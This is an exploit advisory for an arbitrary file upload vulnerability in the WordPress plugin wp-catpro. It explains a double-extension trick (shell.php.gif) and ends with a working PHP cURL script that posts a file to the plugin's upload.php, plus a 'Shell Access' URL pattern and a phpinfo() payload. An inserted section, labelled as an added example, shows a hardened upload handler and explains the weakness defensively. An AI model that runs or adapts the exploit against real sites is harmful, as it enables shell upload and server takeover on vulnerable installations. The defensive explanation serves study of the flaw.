WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit Info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
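The weak point in the upload handler described above is that a name such as shell.php.gif ends in an allowed extension, yet a web server that maps .php anywhere in a filename to the PHP handler (Apache mod_mime with AddHandler, for instance) can still execute it. The following hardened upload.php is an added example written for this page; it is not the plugin's code and not the advisory author's. It keeps the Filedata field name used in the request above but ignores the client-supplied folder parameter; UPLOAD_DIR, ALLOWED_EXT, validate_upload and handle_upload are hypothetical names introduced here.

```php
<?php
// Added example, not the wp-catpro plugin's own code: a hardened upload
// handler that refuses double extensions like shell.php.gif, verifies the
// bytes are really an image, and never reuses the client-chosen name.
// Assumptions: the file arrives in $_FILES['Filedata']; UPLOAD_DIR is a
// hypothetical server-side destination that must not be web-executable.

const UPLOAD_DIR  = __DIR__ . '/uploads/';
const ALLOWED_EXT = ['jpg' => 'image/jpeg', 'gif' => 'image/gif', 'png' => 'image/png'];

/**
 * Returns [true, safe_filename] on success or [false, reason] on rejection.
 */
function validate_upload(string $originalName, string $tmpPath): array
{
    // Drop any directory component the client sent (e.g. ../../x.gif).
    $base = basename($originalName);

    // Require exactly "name.ext": a second dot means a second extension,
    // which is what lets shell.php.gif slip past a last-extension check.
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '') {
        return [false, 'filename must be name.ext with a single extension'];
    }
    $ext = strtolower($parts[1]);
    if (!isset(ALLOWED_EXT[$ext])) {
        return [false, "extension '$ext' is not allowed"];
    }

    // Detect the content type from the bytes, not from the client's header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime !== ALLOWED_EXT[$ext]) {
        return [false, "content type $mime does not match .$ext"];
    }

    // Make sure the image parser actually accepts the file.
    if (@getimagesize($tmpPath) === false) {
        return [false, 'not a decodable image'];
    }

    // Random server-chosen name; the only extension is the validated one.
    $safeName = bin2hex(random_bytes(16)) . '.' . $ext;
    return [true, $safeName];
}

function handle_upload(): void
{
    if (!isset($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        echo 'no file uploaded';
        return;
    }
    $f = $_FILES['Filedata'];

    // Only accept files that PHP itself received via this request.
    if (!is_uploaded_file($f['tmp_name'])) {
        http_response_code(400);
        echo 'invalid upload';
        return;
    }

    [$ok, $result] = validate_upload($f['name'], $f['tmp_name']);
    if (!$ok) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
        return;
    }

    // Destination is fixed server-side; a client 'folder' parameter is ignored.
    if (!move_uploaded_file($f['tmp_name'], UPLOAD_DIR . $result)) {
        http_response_code(500);
        echo 'could not store file';
        return;
    }
    echo $result;
}

handle_upload();
```

Two design choices matter here: the single-extension rule removes the whole class of multi-extension names rather than blacklisting ".php", and the stored name is generated server-side so the regex in the original config (which permits characters like `!@#$%^&()`) never reaches the filesystem. This should still be paired with a web-server rule that refuses to execute scripts under the uploads directory, so that a validation bug does not become code execution.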
#=> Exploit
-----------
<?php

$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif

<?php
phpinfo();
?>